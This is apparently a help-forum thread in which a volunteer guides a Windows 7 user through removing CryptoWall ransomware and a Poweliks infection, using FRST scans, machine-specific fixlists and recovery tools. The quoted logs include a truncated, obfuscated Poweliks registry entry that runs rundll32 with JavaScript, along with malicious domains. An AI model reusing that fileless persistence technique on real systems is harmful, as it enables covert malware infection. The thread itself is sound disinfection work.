URL:Mal threats detected

Greetings,
Avast has been reporting a URL:Mal threat every few minutes (though sometimes it’s quiet for an hour or so). The objects reported are websites like 7508.sindelclick.com, go.wvydeo.com, and cdn.movieroomreviews1.com . The Task Manager shows several COM surrogate processes running; these are unusual for me to see in that list. They seem to be related to the threat messages, and when I end those they return after a short while.

When I first began noticing problems, there was also a file called INSTALL_TOR that had attached itself to almost every directory and folder on my machine. I found and deleted those, as well as some uninstall files that were related to them.

I have run scans with MBAM, FRST64, and aswMBR as suggested in the information guide I found on the forum. The scan logs for those are attached.

My machine is running Windows 7 Home Premium (with Service Pack 1) on a 64-bit OS; computer is an HP s5-1020 model.

I’m very appreciative of any help or further suggestions to deal with this threat.

You have Cryptowall…Do not make any changes until someone helps you.

Could you delete the following folder please as my tools cannot handle the code C:\Users\Campbells\AppData\Roaming\麽鎒駓覜

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-1478152029-1971740551-3079562967-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File Toolbar: HKCU - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File 2014-10-28 22:10 - 2014-10-28 22:10 - 00008562 _____ () C:\Users\Campbells\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-10-28 22:10 - 2014-10-28 22:10 - 00008562 _____ () C:\Users\Campbells\AppData\DECRYPT_INSTRUCTION.HTML 2014-10-28 22:10 - 2014-10-28 22:10 - 00004224 _____ () C:\Users\Campbells\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-10-28 22:10 - 2014-10-28 22:10 - 00004224 _____ () C:\Users\Campbells\AppData\DECRYPT_INSTRUCTION.TXT 2014-10-28 22:10 - 2014-10-28 22:10 - 00000276 _____ () C:\Users\Campbells\AppData\Roaming\INSTALL_TOR.URL 2014-10-28 22:10 - 2014-10-28 22:10 - 00000276 _____ () C:\Users\Campbells\AppData\INSTALL_TOR.URL 2014-10-28 22:09 - 2014-10-28 22:09 - 00008562 _____ () C:\Users\Campbells\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-10-28 22:09 - 2014-10-28 22:09 - 00004224 _____ () C:\Users\Campbells\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-10-28 22:09 - 2014-10-28 22:09 - 00000276 _____ () C:\Users\Campbells\AppData\Local\INSTALL_TOR.URL 2014-10-28 22:07 - 2014-10-28 22:07 - 00008562 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-10-28 22:07 - 2014-10-28 22:07 - 00004224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT 2014-10-28 22:07 - 2014-10-28 22:07 - 00000276 _____ () C:\ProgramData\INSTALL_TOR.URL 2014-10-28 22:02 - 2014-10-28 23:37 - 00000000 ___HD () C:\f097c64 2014-10-28 22:02 - 2014-10-28 22:02 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp 2014-10-28 22:02 - 2014-10-28 22:02 - 00000944 ____H () C:\ProgramData\@system2.att 2014-10-25 21:58 - 2014-10-25 21:58 - 00000000 _____ () C:\Windows\system32\clsjefw.dll CustomCLSID: HKU\S-1-5-21-1478152029-1971740551-3079562967-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that

THEN

Download Anti-CryptorBit.zip to your desktop
Extract Anti-CryptorBitV2 to the desktop and run

https://dl.dropboxusercontent.com/u/73555776/anticrypt.JPG

Select the file type you wish to decrypt and then follow the instructions

Thanks for the suggestions, which I have read a few minutes ago. I will post the logs you asked for in a little while.

I can’t find the folder you asked me to delete. Here is a cmd directory of the …\Roaming folder-- can you tell which one it might be?

c:\Users\Campbells\AppData\Roaming>dir
Volume in drive C is OS
Volume Serial Number is 94DD-6346

Directory of c:\Users\Campbells\AppData\Roaming

10/30/2014 04:07 PM .
10/30/2014 04:07 PM …
10/28/2014 10:09 PM Adobe
10/28/2014 10:09 PM Amazon
10/28/2014 10:10 PM Apple Computer
07/10/2014 02:44 AM Audacity
10/30/2013 05:42 AM AVAST Software
10/28/2014 10:10 PM Blio
10/28/2014 10:10 PM 8,562 DECRYPT_INSTRUCTION.HTML
10/28/2014 10:10 PM 4,224 DECRYPT_INSTRUCTION.TXT
10/30/2014 01:15 AM Dropbox
10/13/2013 02:17 AM dvdcss
10/28/2014 10:10 PM FileZilla
08/06/2011 09:29 AM Hewlett-Packard
08/06/2011 09:19 AM Identities
10/28/2014 10:10 PM 276 INSTALL_TOR.URL
10/28/2014 10:10 PM IObit
08/06/2011 12:51 AM IrfanView
10/30/2014 04:07 PM Lavasoft
10/30/2014 04:02 PM LavasoftStatistics
05/27/2011 04:01 AM Macromedia
10/28/2014 10:10 PM MakeMusic
11/21/2010 03:16 AM Media Center Programs
10/29/2014 06:45 AM Mozilla
04/02/2013 03:14 PM Namco
05/07/2014 06:31 AM Oracle
10/28/2014 10:10 PM QuickVerse 2009 Starter
10/28/2014 10:10 PM Real
08/30/2013 08:22 AM RealNetworks
08/14/2011 08:43 AM Sibelius Software
10/28/2014 10:10 PM Skype
07/23/2013 08:54 AM SoftGrid Client
10/28/2014 10:10 PM Spotify
08/06/2011 10:44 PM TP
08/06/2011 08:50 AM vlc
04/02/2013 03:12 PM WildTangent
3 File(s) 13,062 bytes
33 Dir(s) 838,919,426,048 bytes free

OK, I followed the steps for running the FRST fix. The log file for that process is attached.

I will also work on using Anti-CryptorBit, which I’m guessing will help me get back some files which have been corrupted or encrypted. If so, thanks very much for the tip, because indeed there are some messed up files to rescue!

Thanks for this support, which I felt was provided in a personable and respectful manner. I’ve seen some forums for other software in which the experts are a bit snarky with us poor users who are just trying to get by. :slight_smile:

If there are other steps, I will gladly follow further instructions. If not, thanks again.

Some info for you too read up on… ==>
2014-10-28 22:02 - 2014-10-28 22:02 - 00000448 ____H () C:\Users\Campbells\AppData\Roaming\麽鎒駓覜

The H part means it’s hidden. Since you’re using windows 7…

Open Folder Options by clicking the Start button , clicking Control Panel, clicking Appearance and Personalization, and then clicking Folder Options.
Click the View tab.
Under Advanced settings, click Show hidden files and folders, and then click OK.

You may also need to check the System Files.Folders/Drives… That should allow you too see the randomly named folder :slight_smile:

Excellent! Found that element… and now it’s gone. :slight_smile:

Thanks Michael mayhap I should add that as standard, although this is a new element to that malware :slight_smile:

Once you have completed Anti-CryptorBit can you let me know what problems remain

The computer is running very smoothly now, with no threat announcements from Avast and no COM surrogate indications in Task Manager. All seems fine on that score.

On the other hand, I am not having any success with Anti-CryptorBit. The files I have tried it on so far-- text files, Office documents, jpegs, and PDFs-- have all been unrecoverable. Anti-CryptorBit has reported that some cannot be repaired and that others have been recovered; but those that have been recovered cannot be opened by, say, Microsoft Word. When I tried to open a recovered .doc file after applying Anti-CryptorBit, MS-Word said the file was still corrupted. Word suggested using “Open and repair” and also suggested a “Recover text from any type of file” option with its installed File Recover tool. However, those attempts only returned gibberish instead of real information. Fortunately, about 3/4 of my files were not affected by the virus, so I’m not totally wiped out.

If you have any other recovery options to suggest, that would be great. Still, I’m thankful that there is no ongoing threat. If some files are lost forever, I will just have to deal with that. Some are backed up on an external hard drive, but it’s been too long since I did that, so I’m sure not all are there. Lesson learned about back-ups!

Thank you…

I am afraid the only way to recover those files now is from backups

Subject to no further problems :slight_smile:

I will remove my tools now and give some recommendations, but, I would like you to run for 24 hours or so and come back if you have any problems

Now the best part of the day ----- Your log now appears clean :thumbsup:

A good workman always cleans up after himself so…The following will implement some cleanup procedures as well as reset System Restore points:

Download and run Delfix

https://dl.dropboxusercontent.com/u/73555776/delfix.JPG

: Keep Java Updated :

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser and How to unplug Java from the browser)

Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

https://dl.dropboxusercontent.com/u/73555776/CryptoPrevent.JPG

Malwarebytes.

Update and run weekly to keep your system clean

It is critical to have both a firewall and anti virus to protect your system and to keep them updated.

To learn more about how to protect yourself while on the internet read this little guide Best security practices Keep safe :wave:

Thank you for those notes. The Delfix log is attached, just for info. I will come back if there are issues later on, but otherwise all seems to be the best it can be at the moment.

Thanks and keep safe

Well, I wonder if something leftover is going on now. The hard disk started running non-stop, and a check of Task Manager showed about six or eight processes called qmmhklzi.exe *32 running, with Google Chrome as the description-- even though Google Chrome was closed at the time. I ended those processes, but they returned on their own.

The file location for all these processes seemed to be found in
c:\programdata\microsoft\playready\rtxqdjgq\fytivwmy
which had three files all installed on November 1 at 7:11 pm (about 4-1/2 hours after I first noticed the strange behavior). I tried to delete one file named qmmhklzi.exe found there, but I was not able to do that because the process was active. (It sure was!) There was also a subfolder named 36.0.1985.143 , if that turns out to be a relevant IP address or something.

I ran a scan with MBAM, and it found several Trojan items. I quarantined all of them, and the strange processes stopped running. The file folder mentioned above still exists, but the program qmmhklzi.exe had its name changed to 000000000000000004.0x0 . I have attached the MBAM log here.

After all of that, I also ran another scan with FRST64. I have attached the relevant logs here as well.

I am in the midst of running a scan with aswMBR, too, but that will take a while, so I am going to bed now and will post that log in the morning here.

The aswMBR scan finished faster than I thought. It just closed, so it’s posted here now as well.

OK lets clear those, then I will look at the previous logs to see if I missed them there

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

C:\Users\Campbells\AppData\Local\Apple c:\programdata\microsoft\playready\rtxqdjgq EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that

Thanks… the fixlog results are attached.

No sign of those folders in the previous logs, did you download any programmes apart from the recommended ones ?

No, there were no additional downloads, but my wife remembers checking email around that time, and then she said about a half-hour later Avast reported blocking something (though she didn’t remember exactly what was blocked).

Maybe this is just an unrelated occurrence that only coincidentally happened soon after the previous one. In any case, the family had a conversation at breakfast about being careful where you click. :wink:

Regardless of the cause, there have been no repeated threats or strange processes after my most recent report and MBAM cleanse.

God’s blessings on this Sunday, and thanks for your help again.

No problem I was just curious was all. You can just delete FRST when you are happy

OK, thanks… all set. Take care.